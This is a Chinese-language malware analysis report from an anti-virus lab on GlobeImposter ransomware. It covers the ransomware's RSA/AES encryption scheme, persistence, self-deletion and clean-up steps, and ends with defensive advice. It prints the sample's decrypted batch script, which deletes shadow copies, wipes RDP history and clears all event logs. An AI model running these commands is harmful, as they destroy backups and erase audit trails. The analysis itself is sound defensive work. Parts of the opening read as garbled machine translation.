背景

年新年伊始，勒索病毒再次在国内肆虐。 腾讯安全联合实验室的反病毒实验室最近收到了许多顾客的恐吓软件攻击反馈。 随访分析发现，黑客使用的勒索病毒都是全球imposter家族的勒索病毒，黑客在突破企业防护界限后释放勒索病毒并运行，最终破坏系统，影响正常的业务秩序。

根据对腾讯安全联合实验室抗病毒实验室的分析，此次全球imposter恐吓家族攻击事件呈现出以下特征。

1.GlobeImposter勒索家族有以垃圾邮件方式和扫描渗透方式传播的习惯，此次勒索病毒的攻击过程很可能在Windows远程桌面服务密码被暴力破解后植入勒索病毒。

2 .从威胁病毒样本的层面来看，这次的全球导入器威胁软件对代码进行了一些改变。 过去，该家族样本在加密之前结束了“sql”、“outlook”、“excel”、“word”等过程，但此次威胁病毒中没有这些过程的检测代码。

3 .这次的威胁病毒使用的是RSA AES加密方式。 其中，AES密钥的生成方式不是用以往的随机函数等生成，而是用CoCreateGuid函数生成全局唯一标识符，将该标识符作为AES加密算法的secret key。

在互联网上公开的关于这一家族勒索病毒的分析报告中，文档加密部分的勒索原理尚不清楚，在公开的报告中，文档加密算法等细节也经常超越世代。 因此，本文将论述该样本的胁迫原理，重点从技术角度分析文档的加密过程。

技术分析

2.1威胁整个病毒的加密过程

勒索病毒使用的是RSA AES加密方式，加密过程中有两组RSA密钥(分别为黑客公钥和用户公钥，分别用hacker_rsa_xxx和user_rsa_xxx表示这两组密钥)。 黑客的RSA密钥用于加密用户的RSA密钥，用户的RSA密钥用于加密AES密钥，AES密钥用于加密文件的内容。

具体的加密过程是胁迫病毒首先解密内置的RSA公钥(hacker_rsa_pub )，同时对每个受害者使用RSA生成公钥) user_rsa_pub和user_rsa_pri 针对每个文件，在CoCreateGuid中生成唯一的标识符，根据该唯一的标识符最终生成AES密钥(表示为file_aes_key )，并加密文件。 加密文件时，此唯一标识符使用RSA公钥(user_rsa_pub )加密并保存到文件中。

黑客收到赎金、用户ID和文件后，用自己的私钥(hacker_rsa_pri )对用户ID进行解密，得到user_rsa_pri，然后使用user_rsa_pri进行发送

分析样品中使用的几种技术手段。

2.2加密文字解密算法

软件中的所有信息(如字符和内置公钥)将被加密和存储，而AES算法用于加密。 函数00409392是解密算法函数，函数包含五个参数。 各参数的含义如下。

参数1 :返回值、解密后的内容

参数2 :返回值，解密内容的长度

参数3 :解密密钥

参数4 :解密密钥的长度

自变量5 :如果文件句柄、文件句柄不为空，则将解密后的内容写入与该文件句柄对应的文件

使用mbedtls_aes_crypt_ecb对aes_crypt函数执行AES解码操作。

通过IDA的上下文交叉引用，我们看到了调用MyAESDecode函数对内容进行解密的7个地方。 这7处调用功能的说明如下。

2.3排除排除文件夹的解码和扩展名

恶意样本在威胁期间会绕过包含特定特殊字符的文件夹。 这些特殊字符解码算法如下。

“CC0BE 4f 069 F6 AE6FFCCBFD 92 CE 736 EE 21792 B 858339 D 632 f 57726 C2C DD 384 a”作为AS密钥，使用2.2的解密算法在00401158处进行了硬编码的0x210处理器

2 .对上述解密的RSA公钥(hacker_rsa_pub )计算SHA256，如下计算SHA256的代码片段。

ttps://p5.toutiaoimg.com/origin/66bf0001a8b591620b21?from=pc">

3.使用sha256的值做为AES key，再次利用2.2中的解密算法，解密出字符串列表。

解密出的字符串列表：

2.4 用户ID的生成

勒索病毒运行后，会在用户机器上生成名为”60091F9FF415A9DD5FDFF0D880249E69F883A75D0242CE20D6E6A90CC5AEAFDE”的文件，此文件名为内置的公钥的SHA256哈希值。该文件中保存了用户ID信息。

用户ID的生成算法为：勒索病毒首先通过RSA-1024生成用户公私钥(user_rsa_pub和user_rsa_pri)，将生成的密钥中的rsa.P与rsa.Q拼接上“.TRUE.HOWBACKFILE”等内容后，使用内置的公钥(hacker_rsa_pub)加密，结果作为用户ID，同时，生成的公钥（user_rsa_pub）会做为后面遍历文件系统时的加密key使用。可见，该用户ID也经过了RSA公钥(hacker_rsa_pub)的加密，在没有私钥(hacker_rsa_pri)的情况下，很难还原出RSA-1024的密钥内容。

2.5 文件加密过程

通过GetLogicalDrives得到盘符信息，对每个盘符开启一个线程进行加密，每个线程函数的参数包含三部分内容：当前盘符路径，加密key(user_rsa_pub)，用户ID。

判断文件路径是不是属于排除路径：

函数sub_4094D9会实现对文件的加密，对文件的加密使用的是AES加密算法。下面将详细介绍该函数的过程

AES加密的KEY通过CoCreateGuid生成，CoCreateGuid函数功能为生成全局唯一标识符，勒索病毒使用该全局唯一标识符做为secret_key, secret_key用来生成AES的加密key.。

AES加密时的IV参数由当前文件的大小和文件路径共同生成。IV参数将MD(filesize|| filename )后取前16位。

将IV和secret key使用MBEDTLS_MD_SHA256计算8192次HASH，并将HASH结果做为AES加密的KEY

随后，使用内置的RSA公钥将guid进行加密，并将加密过的guid及用户ID写入到当前文件中。

最后，使用AES算法将文件内容加密。

AES加密算法过程如下：

2.6 自启动

勒索病毒通过在RunOnce注册表下新建名为BrowserUpdateCheck的键值，达到开机自启动的目的。部分代码如下

2.7 自删除

通过调用CMD /c del来实现自删除，部分代码如下

2.8 删除远程桌面连接信息及事件日志

解密bat文件后释放到临时目录下，并加载运行

解密出来的bat文件内容如下

@echo off

vssadmin.exe Delete Shadows /All /Quiet

reg delete "HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientDefault" /va /f

reg delete "HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientServers" /f

reg add "HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientServers"

cd %userprofile%documents

attrib Default.rdp -s -h

del Default.rdp

for /F "tokens=*" %1 in ('wevtutil.exe el') DO wevtutil.exe cl "%1"

Bat会删除远程桌面连接信息文件default.rdp，并通过wevtutil.exe cl命令删除日志信息

总结

从上面的技术分析可以看出，对文件的加密使用的是AES加密，每个文件对应一个AES密钥，AES密钥由CoCreateGuid函数生成，该密钥经过用户公钥(user_rsa_pub)加密后保存在加密后的文件中。黑客使用CoCreateGuid函数生成key，一方面是考虑CoCreateGuid函数生成内容的唯一性与随机性，生成的全局唯一标识符做为key使用不易被猜解；另一方面可能是出于对反勒索安全软件的对抗。

最后，腾讯安全联合实验室反病毒实验室提醒用户提高安全意识，不要随意打开来源不明的文件，或随意点击可疑的链接，对重要的数据文件定期进行非本地备份。对于可疑文件，可以使用腾讯电脑管家进行扫描，或者将文件上传ldyz分析系统（https://habo.qq.com/）查看文件是否存在风险。

针对企业用户，尽量关闭不必要的文件共享权限以及445,135,139,3389等不必要的端口。针对文中提到的勒索攻击事件，可以使用御界防APT邮件网关（http://s.tencent.com/product/yjwg/index.html）和御界高级威胁检测系统（http://s.tencent.com/product/gjwxjc/index.html）两个安全产品进行有效的检测与防护。